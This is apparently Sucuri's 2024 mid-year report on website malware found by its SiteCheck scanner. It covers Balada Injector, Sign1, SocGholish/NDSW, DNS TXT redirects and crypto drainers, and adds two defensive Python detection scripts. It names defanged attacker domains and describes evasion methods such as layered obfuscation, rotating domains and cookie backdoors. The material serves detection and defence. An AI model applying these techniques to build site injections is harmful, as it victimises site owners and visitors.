Conducting an external website scan for indicators of compromise is one of the easiest ways to identify security issues. While remote website scanners may not provide as comprehensive of a scan as server-side scanners, they allow users to instantly identify malicious code and detect security issues on their website without installing any software or applications.
Our free SiteCheck remote website scanner provides immediate insights about malware infections, blocklisting, website anomalies, and errors for millions of websites every month.
In this report, we’ll be analyzing data from the first half of the year to identify the most common malware infections found by our SiteCheck remote scanner. We’ll also provide examples to help website owners understand how to identify malware in their own environments.
Website Malware Infections
In the first half of 2024, SiteCheck scanned a total of 53,234,574 websites. From this number we detected 681,182 infected sites, while another 101,819 sites were found to contain blocklisted resources.
Website infections can occur for a multitude of reasons. But most often, they’re the result of an attacker exploiting a vulnerable website for its valuable resources — credit card information, traffic, SEO, or even server resources.
We analyzed the most common signatures to pinpoint which types of malware were frequently detected on compromised systems. Injected malware and redirects were the most common infection seen in our remote scan data, followed by SEO Spam.
An overlap in distribution percentages exists, as hacked websites are often infected with more than one type of malware.
Malware & Redirects
A total of 473,135 sites were detected with injected malware and redirects, accounting for 69.46% of website infections detected by SiteCheck in the first half of 2024.
Malware in this category is defined as malicious external script injections, iframes, and inline scripts, excluding any detections already flagged as SEO spam. It is typically found injected into JavaScript files or nestled within a site’s HTML code.
Balada Injector
SiteCheck detected 100,470 sites injected with obfuscated scripts for the ongoing massive malware campaign known as Balada Injector, accounting for 21.23% of malware injections in the first half of 2024.
The Balada malware campaign was among the top infections that Sucuri’s remediation team cleaned so far this year, and is known to redirect site visitors to scams, ads and other malicious resources.
The JavaScript injections for this campaign are typically found in the database options of vulnerable plugins, appended to one or several legitimate .js files, or injected into the header and/or footer of the page so that they fire on every page load and redirect traffic to the attacker’s final destination.
Character code obfuscation (decoded using String.fromCharCode) is a tell-tale sign of Balada injections, although in 2024 it is less obvious, as the attackers add other obfuscation layers on top of it. For example, here’s the most detected variation of the Balada script (soft.specialcraftbox[.]com) injected using the Popup Builder vulnerability:
When Balada scripts are injected as a link directly to a malicious third party website, they are detected as a blocklisted resource instead of a malware injection; an additional 11,668 websites were detected with blocklisted resources for Balada malware campaign in the first half of 2024. Over 80% of blocklisted Balada scripts pointed to various subdomains of startperfectsolutions[.]com.
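As an added illustration (not code from the report or from Sucuri), the following Python peels off the String.fromCharCode layer so that a script URL hidden behind character codes becomes visible and can be compared against blocklists. The loader sample is constructed, uses the defanged domain named above, and carries only this one obfuscation layer; real injections stack further layers on top, as noted.

```python
import json
import re

# Matches one String.fromCharCode(...) call whose argument list is plain integers,
# the obfuscation layer the report names as the tell-tale sign of Balada injections.
FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([0-9][0-9,\s]*)\)")
URL_RE = re.compile(r"https?://[^\s\"'<>()]+")

def _decode(codes: str) -> str:
    """Turn "104,116,116" into the text those character codes spell."""
    return "".join(chr(int(c)) for c in re.split(r"[\s,]+", codes.strip()) if c)

def decode_fromcharcode(js: str) -> list:
    """Return the decoded text of every String.fromCharCode call in the script."""
    return [_decode(m.group(1)) for m in FROMCHARCODE.finditer(js)]

def deobfuscate(js: str) -> str:
    """Replace each call with the equivalent quoted string literal."""
    return FROMCHARCODE.sub(lambda m: json.dumps(_decode(m.group(1))), js)

def find_hidden_urls(js: str) -> list:
    """URLs that appear only after decoding, i.e. the ones the obfuscation was hiding."""
    visible = set(URL_RE.findall(js))
    return [u for u in URL_RE.findall(deobfuscate(js)) if u not in visible]

def _charcodes(text: str) -> str:
    """Helper used only to build the constructed sample below."""
    return "String.fromCharCode(" + ",".join(str(ord(c)) for c in text) + ")"

# Constructed sample (not a real injection): a loader whose only URL is hidden behind
# String.fromCharCode; the host is the defanged domain named in the report.
SAMPLE = (
    "<script>var s=document.createElement('script');"
    "s.src=" + _charcodes("https://soft.specialcraftbox[.]com/main.js") + ";"
    "document.head.appendChild(s);</script>"
)

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    print(find_hidden_urls(SAMPLE))
```

A URL that only surfaces after decoding is worth checking against blocklists, since legitimate scripts rarely need to hide where they load from.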
Sign1
The Sign1 malware campaign is a massive and persistent threat that SiteCheck detected on 56,999 infected websites, accounting for 12.05% of malware injections in the first half of 2024. It employs deceptive tactics like obfuscating malicious code, dynamic URL generation with time-based randomization, and XOR encoding to evade detection.
When triggered on a compromised site, the malware injects malicious scripts that check the visitor’s referrer. If they arrived from major sites like Google or Facebook, it executes code to set tracking cookies and redirect victims to VexTrio scam sites displaying fake “allow if you’re not a robot” prompts.
To stay undetected, Sign1 malware is often injected into legitimate WordPress plugins like Simple Custom CSS and JS that allow inserting arbitrary code. This lets attackers modify site behavior without changing server files, which is harder for security scanners to catch. The malware domains are constantly rotated, using techniques like hexadecimal timestamps in URLs that only work for 10 minutes at a time.
SocGholish
Another malware injection of significant note was SocGholish, which was responsible for over 11.88% of injections in the first half of 2024. In addition to script injections, a total of 37,269 websites were found to contain external script tags pointing to known SocGholish domains.
This malware is responsible for redirecting site visitors to malicious pages designed to trick victims into installing fake browser updates. JavaScript is used to display notices in the victim’s web browser and initiate a download for remote access trojans, allowing the attacker to gain full access and remotely control the victim’s computer including mouse and keyboard, file access, and network resources. SocGholish is also known to be the first stage in ransomware attacks against large corporations.
In 2024, several distinct website malware campaigns were known to serve SocGholish malware:
In some cases, our remote scanner found more than one type of SocGholish infection on the same site.
NDSW
The ongoing NDSW/NDSX malware campaign — the most prevalent SocGholish variant — accounted for 43,106 detections in the first half of 2024.
What differentiates NDSW from so-called “vanilla” SocGholish code is that the malware references an NDSW (or NDSJ) variable and contains a custom wrapper used to dynamically serve the malicious injection through a PHP proxy.
Our remediation team often finds large numbers of impacted files for this infection, as attackers are known to inject the malware into every .js file on the hacked website.
The malware operates in two parts. Firstly, a malicious JavaScript injection (NDSW or NDSJ) is typically found injected within HTML at the end of an inline script or appended to the bottom of every .js file in the compromised environment. The second layer with the NDSX payload (responsible for SocGholish fake browser update pages) is served by a malicious PHP proxy script, which is typically located in a random directory on the same infected domain.
In addition to the common NDSW injections, we started detecting ZQXQ and ZQXW variations in the first half of 2024.
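An added example, not code from the report or from Sucuri’s tooling: a small sweep over a web root that flags .js, .html and .php files referencing the NDSW/NDSJ/ZQXQ/ZQXW markers described above and notes whether the first hit sits at the end of the file, where the injection is appended. The web root it scans is constructed in a temporary directory, and the variable stubs in it are placeholders rather than the real payload.

```python
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Optional

# Markers named in the report: the NDSW/NDSJ variable referenced by the injection
# and the ZQXQ/ZQXW variations first seen in the first half of 2024.
MARKER = re.compile(r"\b(ndsw|ndsj|zqxq|zqxw)\b", re.IGNORECASE)
SCAN_SUFFIXES = {".js", ".html", ".htm", ".php"}

def scan_file(path: Path, tail_chars: int = 4096) -> Optional[Dict]:
    """Return marker hits for one file, noting whether the first hit sits in the
    tail of the file, where the report says the injection is appended."""
    data = path.read_text(encoding="utf-8", errors="replace")
    hits = sorted({m.group(1).lower() for m in MARKER.finditer(data)})
    if not hits:
        return None
    first = MARKER.search(data).start()
    return {"path": str(path), "markers": hits,
            "in_tail": first >= max(0, len(data) - tail_chars)}

def sweep(root: str) -> List[Dict]:
    """Walk a web root and list every script/markup file carrying a marker."""
    findings = []
    for p in sorted(Path(root).rglob("*")):
        if p.is_file() and p.suffix.lower() in SCAN_SUFFIXES:
            hit = scan_file(p)
            if hit:
                findings.append(hit)
    return findings

def demo() -> List[tuple]:
    """Constructed web root (not real malware): one .js file with a stub declaring
    an ndsw variable appended, one referencing zqxw, and one clean file."""
    with tempfile.TemporaryDirectory() as root:
        js = Path(root, "wp-includes", "js")
        js.mkdir(parents=True)
        (js / "jquery.min.js").write_text("/* library code */ function a(){}" + ";var ndsw=true;")
        (js / "other.js").write_text("var zqxw = 1;")
        (js / "clean.js").write_text("function ok(){return 1;}")
        return [(Path(f["path"]).name, f["markers"], f["in_tail"]) for f in sweep(root)]

if __name__ == "__main__":
    for name, markers, in_tail in demo():
        print(name, markers, "appended" if in_tail else "inline")
```

Hits are a starting point for review rather than a verdict: a legitimate identifier could match, and a clean-looking hit count of zero says nothing about the PHP proxy script that serves the NDSX payload.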
DNS TXT Records
Detected on 23,820 infected sites in the first half of 2024, the DNS TXT records malware campaign infects WordPress websites by injecting malicious code snippets through WordPress plugins.
The malware fetches encrypted redirect URLs from dynamic DNS TXT records of attacker-controlled domains. These URLs lead to malicious sites that initiate redirect chains to VexTrio scam pages. Initially, the malware used client-side JavaScript injections, but in March 2024 switched to stealthier server-side PHP redirects.
The malware employs evasive techniques like hiding the plugin, disguising admin notifications, and introducing a cookie-based backdoor to update the DNS tracking domain or create rogue admin users. It also ensures persistence through the attacker’s bots, who reactivate the plugin whenever it is disabled.
Bogus URL Shorteners
Detected on 16,086 infected websites during the first half of 2024, the Bogus URL Shorteners malware campaign leverages URL shortening services to redirect website visitors to low-quality question and answer sites monetized through Google Adsense.
The malicious code is often injected into WordPress pages, posts, testimonials, or comments as obfuscated JavaScript containing multiple bogus URL shorteners. When executed on a mobile browser after a user interaction, it redirects visitors through several layers of intermediary sites mimicking Google search clicks before landing on the spam blogs displaying Google ads.
Web3 Crypto Drainers
SiteCheck detected Web3 Crypto Drainer malware on 9,966 infected websites in the first half of 2024. This campaign represents a recent surge involving a novel form of website malware targeting Web3 and cryptocurrency assets by injecting crypto drainers onto compromised websites.
These drainers use phishing tactics like misleading popups to trick visitors into connecting their cryptocurrency wallets to the malicious site. Once connected, the malware drains funds from the victim’s wallet by signing unauthorized transactions that transfer assets to the attacker’s wallet.
One of the biggest Crypto Drainer campaigns is called “Angel Drainer” which has been spreading these malicious injections across thousands of hacked websites since January 2024. The injected scripts create fake “Connect Wallet” popups that claim to be for accepting terms, claiming airdrops, or verifying the visitor’s wallet under false pretexts; signing these requests allows the drainer to access and drain the victim’s cryptocurrency funds.
Interested in more? View the rest of the data sets and malware samples for SEO spam, hidden content, credit card skimmers, unwanted ads, defacements, and more from our latest 2024 Mid-Year SiteCheck report.
TL;DR
This report revealed a number of insights from the first half of 2024 for our remote website scanner:
- SiteCheck detected malware on 681,182 infected sites from January 1st to June 30th, 2024.
- 234,033 sites were detected with SEO spam, accounting for 34.36% of website infections.
- 100,470 websites were detected with Balada Injector, the ongoing massive malware campaign targeting vulnerabilities in WordPress plugins and themes.
- 14.94% of infected websites were found to include external scripts or iframes referencing blocklisted domains.
While no security solution is 100% guaranteed to protect your website’s environment, there are a number of different solutions that you can utilize for an effective defense-in-depth strategy.
Always keep website software updated with the latest security patches to mitigate risk from software vulnerabilities — including plugins, themes, and core CMS. Consider employing file integrity monitoring or comprehensive website monitoring services to detect indicators of compromise and anomalies. Enforce strong, unique passwords for all user accounts. You can leverage a web application firewall to help filter out malicious traffic, block bad bots, virtually patch known vulnerabilities, and mitigate DDoS.
Do you have comments or suggestions for this report? We’d love to hear from you! Share your feedback on Twitter or email us labs@sucuri.net.